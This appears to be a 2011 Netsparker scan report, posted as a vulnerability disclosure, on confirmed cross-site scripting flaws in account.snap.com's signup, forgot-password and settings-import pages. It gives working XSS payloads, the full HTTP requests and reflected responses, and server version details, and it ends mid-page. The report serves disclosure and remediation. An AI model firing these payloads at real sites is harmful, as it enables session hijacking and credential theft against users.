XSS, Cross Site Scripting in account.snap.com/login.php, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY


Netsparker - Scan Report Summary
TARGET URL: https://account.snap.com/login.php
SCAN DATE: 7/23/2011 4:07:58 PM
REPORT DATE: 7/25/2011 7:06:40 AM
SCAN DURATION: 00:34:04

Total Requests:
Average Speed: req/sec.
Identified: 20
Confirmed: 12
Critical: 0
Informational: 4

SCAN SETTINGS
Profile: Previous Settings
Enabled Engines: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES
Severity distribution (chart): IMPORTANT 35 %, MEDIUM 15 %, LOW 30 %, INFORMATION 20 %

VULNERABILITY SUMMARY

URL | Parameter | Method | Vulnerability | Confirmed
/ | | | Redirect Response BODY Is Too Large | Yes
/add_site.php | url | POST | [Possible] Cross-site Scripting | No
/add_site.php | url | POST | [Possible] Cross-site Scripting | No
/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) | URI-BASED | Raw URI | [Possible] Cross-site Scripting | No
/forgot_password.php | email | POST | Cross-site Scripting | Yes
/importsettings.php | email | POST | Cross-site Scripting | Yes
/importsettings.php | key | POST | Cross-site Scripting | Yes
/importsettings.php | email | POST | Cross-site Scripting | Yes
/importsettings.php | key | POST | Cross-site Scripting | Yes
/javascript/ | | | Apache Version Disclosure | No
/javascript/ | | | PHP Version Disclosure | No
/javascript/ | | | OpenSSL Version Disclosure | No
/javascript/ | | | Apache Module Version Disclosure | No
/javascript/ | | | Forbidden Resource | Yes
/login.php | | | Cookie Not Marked As Secure | Yes
/login.php | | | Auto Complete Enabled | Yes
/login.php | | | Cookie Not Marked As HttpOnly | Yes
/signup.php | | | File Upload Functionality Identified | Yes
/signup.php | | | E-mail Address Disclosure | No
/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) | URI-BASED | Raw URI | Cross-site Scripting | Yes
Cross-site Scripting

Total: 6 | Severity: IMPORTANT | Confirmed: 6
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the current user's session or rewriting the page's HTML on the fly to change its appearance and steal the user's credentials. It happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is output.

Before sanitizing user input, define a list of the characters that are both expected and acceptable and use it to populate a white-list. This list only needs to be defined once and should then be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

- /signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) CONFIRMED

https://account.snap.com/signup.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
URI-BASED Raw URI /" stYle="x:expre/**/ssion(alert(9))

Request

GET /signup.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:10:48 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
- /forgot_password.php

/forgot_password.php CONFIRMED

https://account.snap.com/forgot_password.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000232)</script>

Request

POST /forgot_password.php HTTP/1.1
Referer: https://account.snap.com/forgot_password.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 91
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000232)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:29:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3022
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Forgot Password</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Forgot Your Password</h1><div id="colCombine"> <form id="forgot_password" name="forgot_password" action="/forgot_password.php" method="post"><p class="alert">The email address was invalid. Please try again.</p><p>If you can't remember your email, you can <a href="/signup.php">sign-up for a new Snap Shots account</a>.</p> <div id="enterInfo" style="margin:0 15px"> <div> <h2>Please Enter Your Email</h2> </div> <div> <h5>Your Email:</h5> <input type="text" class="text" name="email" value="'"--></style></script><script>netsparker(0x000232)</script>"> </div> <div class="btn"> <img onclick="javascript:document.forgot_password.submit();" src="/images/btn-sendPW.gif" width="240" height="31" alt="Send Password" title="Send Password" /> </div> <div class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </div> </div> </form> </div></div><div id="rightSide"> <div class="sidebar"> <h4>Recent Blog Posts</h4> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/forgot_password.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000244)</script>
key POST 3

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 97
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000244)%3c%2fscript%3e&key=3

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:30:00 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5281
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. 
<br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="'"--></style></script><script>netsparker(0x000244)</script>"> <input type="hidden" name="key" value="3"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> '"--></style></script><script>netsparker(0x000244)</script> </li> <li> <h5>Site URL</h5> 3 </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST netsparker@example.com
key POST '"--></style></script><script>alert(0x000248)</script>

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Content-Length: 120
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email=netsparker%40example.com&key='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000248)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:30:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5323
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. 
<br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="netsparker@example.com"> <input type="hidden" name="key" value="'"--></style></script><script>netsparker(0x000248)</script>"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> netsparker@example.com </li> <li> <h5>Site URL</h5> '"--></style></script><script>netsparker(0x000248)</script> </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST '"--></style></script><script>alert(0x000491)</script>
key POST 3
x POST 0
y POST 0

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 105
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000491)%3c%2fscript%3e&key=3&x=0&y=0

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:39:14 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5281
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. 
<br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="'"--></style></script><script>netsparker(0x000491)</script>"> <input type="hidden" name="key" value="3"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> '"--></style></script><script>netsparker(0x000491)</script> </li> <li> <h5>Site URL</h5> 3 </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
- /importsettings.php

/importsettings.php CONFIRMED

https://account.snap.com/importsettings.php

Parameters

Parameter Type Value
email POST netsparker@example.com
key POST '"--></style></script><script>alert(0x000496)</script>
x POST 0
y POST 0

Request

POST /importsettings.php HTTP/1.1
Referer: https://account.snap.com/importsettings.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 128
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email=netsparker%40example.com&key='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000496)%3c%2fscript%3e&x=0&y=0

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 22:39:18 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 5323
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script type="text/javascript" language="javascript">// <! Tooltip Functions function xstooltip_findPosX(obj) { var curleft = 0; if (obj.offsetParent) { while (obj.offsetParent) { curleft += obj.offsetLeft obj = obj.offsetParent; } } else if (obj.x) curleft += obj.x; return curleft;}function xstooltip_findPosY(obj) { var curtop = 0; if (obj.offsetParent) { while (obj.offsetParent) { curtop += obj.offsetTop obj = obj.offsetParent; } } else if (obj.y) curtop += obj.y; return curtop;}function xstooltip_show(tooltipId, parentId, posX, posY){ it = document.getElementById(tooltipId); if ((it.style.top == '' || it.style.top == 0) && (it.style.left == '' || it.style.left == 0)) { // need to fixate default size (MSIE problem) it.style.width = it.offsetWidth + 'px'; it.style.height = it.offsetHeight + 'px'; img = document.getElementById(parentId); // if tooltip is too wide, shift left to be within parent if (posX + it.offsetWidth > img.offsetWidth) posX = img.offsetWidth - it.offsetWidth; if (posX < 0 ) posX = 0; x = xstooltip_findPosX(img) + posX; y = xstooltip_findPosY(img) + posY; it.style.top = y + 'px'; it.style.left = x + 'px'; } it.style.visibility = 'visible'; }function xstooltip_hide(id){ it = document.getElementById(id); it.style.visibility = 'hidden'; }// ]]></script><div id="top-cap"></div><div id="wrapper"><div id="tip1" class="tooltip"> Your Shots Key was created when you signed up for Snap Shots and can be <br /> found inside the Snap Shots JavaScript tag (view source) on any page where <br /> you currently have Snap Shots enabled. 
<br /><br /> Example of Snap Shots JavaScript tag: <br /> &lt;script type="text/javascript" src="http://shots.snap.com/snap_shots.js?ap=1<br /> &amp;key=<b>29b1ec081f2bf5401db979cf98f6b845</b>&amp;th=silver..."&gt;&lt;/script&gt;</div> <div class="clear"></div><div id="leftSide"><h1>Import Your Old Snap Shots Settings</h1><form action="/importsettings.php" method="post"> <div id="column2"> <input type="hidden" name="email" value="netsparker@example.com"> <input type="hidden" name="key" value="'"--></style></script><script>netsparker(0x000496)</script>"> <input type="hidden" name="retry" value="1"> <ul id="Failed"> <li> <h2 class="red0">Validation Failed: Bad Match</h2> </li> <li> We were unable to find a match between the Email and Site URL that you provided. </li> <li> <h5>Email</h5> netsparker@example.com </li> <li> <h5>Site URL</h5> '"--></style></script><script>netsparker(0x000496)</script> </li> <li> Please make sure that both the Email and the Site URL are correct and feel free to try again. </li> <li> Or, if you would rather just keep going right now, you can choose to start fresh with a new account and a new Snap Shots installation. </li> <li> <div class="l"> <a href="/signup.php"><img src="/images/btn-createNew.gif" width="160" height="31" alt="Create New Account" title="Create New Account" /></a> </div> <div class="r"> <input type="image" class="image" src="/images/btn-tryAgain.gif" width="156" height="31" alt="Try Again" title="Try Again" /> </div> </li> <div class="clear"></div> </ul> </form> </div> <div id="column1"> </div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
